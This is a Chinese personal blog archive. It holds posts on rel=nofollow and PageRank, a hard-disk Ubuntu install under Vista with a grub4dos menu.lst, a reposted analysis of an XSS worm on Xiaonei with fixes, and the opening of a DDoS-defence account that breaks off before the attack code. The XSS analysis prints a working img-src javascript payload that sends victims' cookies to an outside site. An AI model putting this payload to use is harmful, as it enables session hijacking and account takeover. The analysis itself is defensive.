rel= no follow 使用Nofollow属性让搜索引擎不要抓取并追踪此链接。
网上都说google都认这个属性,不过测试下来即使使用了rel= no follow 还是传递了PR,结果本人的一个站点因此PR从4降到了3。哎,小人之心还是不能有,还是不用的好啊!
Archive for the ‘网站建设’ Category
万恶的rel= no follow
vista下装硬盘安装ubuntu
1.为什么硬盘安装?
因为我比较灰主流。硬盘装速度太快了,十分钟不到就完了。磁盘都不转,一点发热量都没有,真没意思。唉……
2.需要准备什么?
2.1 ubuntu 的iso 。版本你自己选吧。我就用的9.04
2.2 在vista下建立好分区吧。至少两个空闲分区:一个挂载系统。另一个作为swap分区
2.3 从iso中提取到的 initrd.gz/vmlinuz文件
这个我要说明一下:在8.04版或者debian的硬盘安装中,这两个文件还要额外去下载。因为光盘里面的检索方式和磁盘检索不同
2.4 grldr:这个到grub4dos网站下载,下载最新版,解压后提取就行
2.5 ntldr:这个在那个啥,网站上自己去找吧。我也有,都传到这里(http://www.uushare.com/user/hadnt/file/2128846)了。
2.6 修改过的menu.lst / boot.ini 文件。
3. 具体安装过程
这个大家参见这两个地方
http://www.pcpop.com/doc/0/242/242833_1.shtml (直接看第三/四页就成)
http://hi.baidu.com/%C7%E5%B7%E7%EC%C5/blog/item/6365ffbe4285210219d81f2f.HTML
我就重点解释下对menu.lst 的改写:
------------------------------
title Install Ubuntu
root (hd0,0)
kernel (hd0,0)/vmlinuz boot=casper iso-scan/filename=/Ubuntu-9.04-desktop-i386.iso ro quiet
splash locale=zh_CN.UTF-8
initrd (hd0,0)/initrd.gz
----------------------------------
root(hd0,0) hd0 : 第一块磁盘 0:第一个分区 (活动的主分区)
iso-scan/filename=/Ubuntu-9.04-desktop-i386.iso 这个就是 iso-scan 命令,实际上你只要把iso放到一个NTFS目录,它就自己可以检索到这个iso。
假设你把2 中需要的文件都放到了D盘,那么,把(hd0,0) => (hd0,4)。 这个4你可以通过winfgrub 来查看,或者在你没有改过磁盘驱动器号的时候默认为 0-3为主分区,4为第一个逻辑分区。
就是说这些文件其实放哪里都无所谓,不过放到根目录下更方便一点而已
4. 安装遇到的问题
这个只有一个 :
貌似是 /isodriver 正被其它程序占用,当时脑袋锈逗了,只想到是不是挂载的iso要卸载,于是
sudo umount /media/cdrom
提示:小样!压根还没有挂载呢
后来在论坛上看人提示才回过神来:
sudo umount /isodriver
5.安装之后的上网问题
厄,我都没解决,怎么告诉你啊?
等哥搞定了告诉你们。。。。。。
不过 flex021 这里做了个总结,适用于 whu 的锐捷上网:
http://bbs.whu.edu.cn/wForum/disparticle.php?boardName=Linux_Unix&ID=19833&pos=1
偶然搜索到一篇别人对我的分析
全文如下:
现在校内网出现了一个跨站漏洞,当用户在访问一些日志的时候,日志或者分享或者其他的资料就被修改了。
而 事实上,只要他们原因,可以做任何事情,因为他们获取到了你的cookie。
问题原因:
从一篇有问题的日志发现如下的代码:
《img src='
javascript:a
lert('hacked
by Sroan');wi
ndow.locatio
n.href='http
://www.33iq.c
n/xiaonei.ph
p?cookie='+do
cument.cookie
'》
这个应该是经过处理了,中间已经没有了分号,如果给src添加上分号,然后使用html_entity_decode解码之后就是:
javascript:alert('hacked by Sroan');window.location.href='
http://www.33iq.cn/xiaonei.php?cookie='+document.cookie
很明白了, 实际上就是Sroan利用在img的src中执行javascript中的特性,执行了一段javascript代码,而这段代码会将你的cookie提交到33iq.cn这个网站,然后他们就可以使用你的cookie去做一些事情了,获取你的个人资料,修改你的日志,修改你的个人资料 等等。
很可怕,哈哈。
解决方法:
1. 最重要的当然是过滤个人提交的日志的内容了, 牢记一切输入都是有害的。
2. 可以在cookie中添加IP的信息,在校验cookie的时候,如果IP不正确,则需要用户重新登录。
第一种方法都在使用,但是具体到什么程度,是不是有bug就很难说了,而校内的问题就在这儿了。
第二种方法使用的应该比较少。
当然,理论上,如果直接src等于上面那些东西也不会有问题的,问题是你在处理的时候将那些代码不明地decode了,并显示了出来,问题就来了。
一次抵御DDOS攻击经历
我预料到了大盘的下挫,但是没有预料到网站会遭受如此强的DDOS攻击,第一次在攻与防的世界中,站在防的一端。这两天和服务器的管理员都聊成了朋友了,疲惫不堪,眼睛都绿了。如果你有耐心看完这篇文章,绝对胜过你在信安实验室呆一周,因为这是一次实实在在的防御! 先说下服务器情况,WIN2000+IIS,无贷款限制,无IIS连接限制,酷睿CPU,CPU上线6%。网站结构基本纯静态HTML+少量PHP。由于CPU有上限,当CPU超负荷工作后,网站就瘫痪掉。
攻击者买了一个域名(我查过域名历史,攻击者买了这个域名后就来攻击我),让所有肉鸡攻访问该域名上的一个网页,该网页的代码很简单。就四个iframe,就是四次对我的网站发送HTTP请求,说得通俗点,就是每个肉鸡刷新4次网页。从凌晨3点多开始攻击,到了我起来的时候9点多就瘫痪了。
这个攻击方式最不好的一个地方,暴露了攻击者的转向域名,因为利用iframe转向,get数据包里会有reffer记录,会指向改转向域名的。寻找服务商的客服,结果是他们也没有办法(其实他们也没想到后来会有多严重)
既然知道对方的转向域名以及攻击方式,我把我的网站的郁闷转向到攻击域名上,也就是说攻击者发送的数据包到我的域名上,我再转给了攻击者,当然这样我的网站也是访问不了,不过攻击者的转向域名的服务器也很快瘫痪了。
我又把域名解析回来,又恢复正常了。不过攻击又改变了攻击策略。重新写了攻击代码,代码如下